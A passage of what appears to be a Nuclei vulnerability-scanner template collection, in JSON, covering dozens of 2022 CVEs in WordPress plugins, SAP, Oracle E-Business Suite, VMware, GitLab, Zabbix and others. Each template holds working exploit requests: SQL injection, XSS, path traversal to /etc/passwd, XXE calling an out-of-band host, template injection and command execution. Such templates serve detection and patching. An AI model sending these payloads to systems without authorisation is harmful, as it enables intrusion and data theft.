ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, md5(num))","contains(content_type, \"application/json\")","contains(body, \"badgeos-arrange-buttons\")"],"condition":"and"}]}]},{"id":"CVE-2022-4295","info":{"name":"Show all comments < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"Select </option>\")"],"condition":"and"}]}]},{"id":"CVE-2022-22536","info":{"name":"SAP Memory Pipes (MPI) Desynchronization","severity":"critical"},"requests":[{"raw":["GET {{sap_path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 82646\nConnection: keep-alive\n\n{{repeat(\"A\", 82642)}}\n\nGET / HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"sap_path":["/sap/admin/public/default.html","/sap/public/bc/ur/Login/assets/corbu/sap_logo.png"]},"stop-at-first-match":true,"unsafe":true,"read-all":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(body), 'administration')","contains(tolower(header), 'content-type: image/png')"],"condition":"or"},{"type":"word","part":"body","words":["HTTP/1.0 400 Bad Request","HTTP/1.0 500 Internal Server Error","HTTP/1.0 500 Dispatching Error"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0846","info":{"name":"SpeakOut Email Petitions < 2.14.15.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Your signature has been added\") || contains(body, \"This petition has already been signed using your email address\")"],"condition":"and"}]}]},{"id":"CVE-2022-24288","info":{"name":"Apache Airflow OS Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command","{{BaseURL}}/code?dag_id=example_passing_params_via_test_command"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["foo was passed in via Airflow CLI Test command with value {{ params.foo }}"]}]}]},{"id":"CVE-2022-33965","info":{"name":"WordPress Visitor Statistics <=5.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"regex","regex":["^1331' and sleep\\(5\\) or '$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2185","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778","a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-28219","info":{"name":"Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/agent/tabs/agentData"],"body":"[\n  {\n    \"DomainName\": \"{{Host}}\",\n    \"EventCode\": 4688,\n    \"EventType\": 0,\n    \"TimeGenerated\": 0,\n    \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n  }\n]\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["ManageEngine"]}]}]},{"id":"CVE-2022-21587","info":{"name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\nM=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\nM,BTR,34X-R([\"G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI=\"`P.PH*4$L!`A0#\nM%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````\"XN+RXN\nM+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R\nG:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n`\nend\n------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n","GET /OA_CGI/FNDWRR.exe HTTP/1.1\nHost: {{Hostname}}\n","POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;`I02P$\"%`,4``````!M<#16DP;7,@$````!````0P``````````\nM````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5\"4RUA\nM<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`\n(``!B````````\n`\nend\n"],"matchers":[{"type":"word","part":"body_2","words":["Nuclei-CVE-2022-21587"]}]}]},{"id":"CVE-2022-3506","info":{"name":"WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n","GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")","contains(body_4, 'The amount of automatically')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-31982","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Request Detail\")"],"condition":"and"}]}]},{"id":"CVE-2022-4301","info":{"name":"WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Registration Form"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22954","info":{"name":"VMware Workspace ONE Access - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Authorization context is not valid"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-30073","info":{"name":"WBCE CMS 1.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<p><b><script>alert(document.cookie)</script>","WBCECMS"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"formtoken","group":1,"regex":["<input\\stype=\"hidden\"\\sname=\"formtoken\"\\svalue=\"([^\"]*)\"\\s/>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-41840","info":{"name":"Welcart eCommerce <=2.7.7 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43166","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-39195","info":{"name":"LISTSERV 17 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44946","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0786","info":{"name":"WordPress KiviCare <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Doctor details\")"],"condition":"and"}]}]},{"id":"CVE-2022-0535","info":{"name":"WordPress E2Pdf <1.16.45 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_nonce={{nonce}}&e2pdf_user_email=&e2pdf_api=api.e2pdf.com&e2pdf_connection_timeout=300&e2pdf_processor=0&e2pdf_dev_update=0&e2pdf_url_format=siteurl&e2pdf_mod_rewrite=0&e2pdf_mod_rewrite_url=e2pdf%2F%25uid%25%2F&e2pdf_cache=0&e2pdf_cache=1&e2pdf_cache_fonts=0&e2pdf_cache_fonts=1&e2pdf_debug=0&e2pdf_hide_warnings=0&e2pdf_images_remote_request=0&e2pdf_images_timeout=30&e2pdf_revisions_limit=3&e2pdf_memory_time=0&e2pdf_developer=0&e2pdf_developer_ips=%3C%2Ftextarea%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&submit=Save+Changes\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, 'placeholder=\\\"Developer IPs\\\" ></textarea><svg/onload=alert(document.domain)>')","contains(header_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-34753","info":{"name":"SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /delsnap.pl?name=|id HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1815","info":{"name":"Drawio <18.1.2 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /service/0/test.oast.me HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-47003","info":{"name":"Mura CMS <10.0.580 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-34048","info":{"name":"Wavlink WN-533A8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x\");alert(9);x=(\"?login=0\");</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3578","info":{"name":"WordPress ProfileGrid <5.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pm_add_group&id=\"><script>alert%28document.domain%29<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, \"Extension Options\")","contains(body_2, \"<script>alert(document.domain)</script>&tab\")"],"condition":"and"}]}]},{"id":"CVE-2022-24260","info":{"name":"VoipMonitor - Pre-Auth SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"success\":true","_vm_version","_debug"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2022-2599","info":{"name":"WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","GOTMLS_mt"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0201","info":{"name":"WordPress Permalink Manager <2.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(/XSS/)>","pm_query"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-0653","info":{"name":"Wordpress Profile Builder Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"javascript:alert(document.domain);\">here</a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1168","info":{"name":"WordPress WP JobSearch <1.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(domain)>","wp-jobsearch"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-0867","info":{"name":"WordPress ARPrice <3.6.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)\n","GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"text/html\")","contains(body_2, \"ArpPriceTable\")"],"condition":"and"}]}]},{"id":"CVE-2022-2863","info":{"name":"WordPress WPvivid Backup <0.9.76 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"_ajax_nonce\":\"([0-9a-z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-23134","info":{"name":"Zabbix Setup Configuration Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/setup.php","{{BaseURL}}/setup.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"},"matchers-condition":"and","matchers":[{"type":"word","words":["Database","host","port","Zabbix"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0773","info":{"name":"Documentor <= 1.5.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)\n","GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(content_type_1, \"text/html\")","contains(body_1, \"([])\") && contains(body_2, 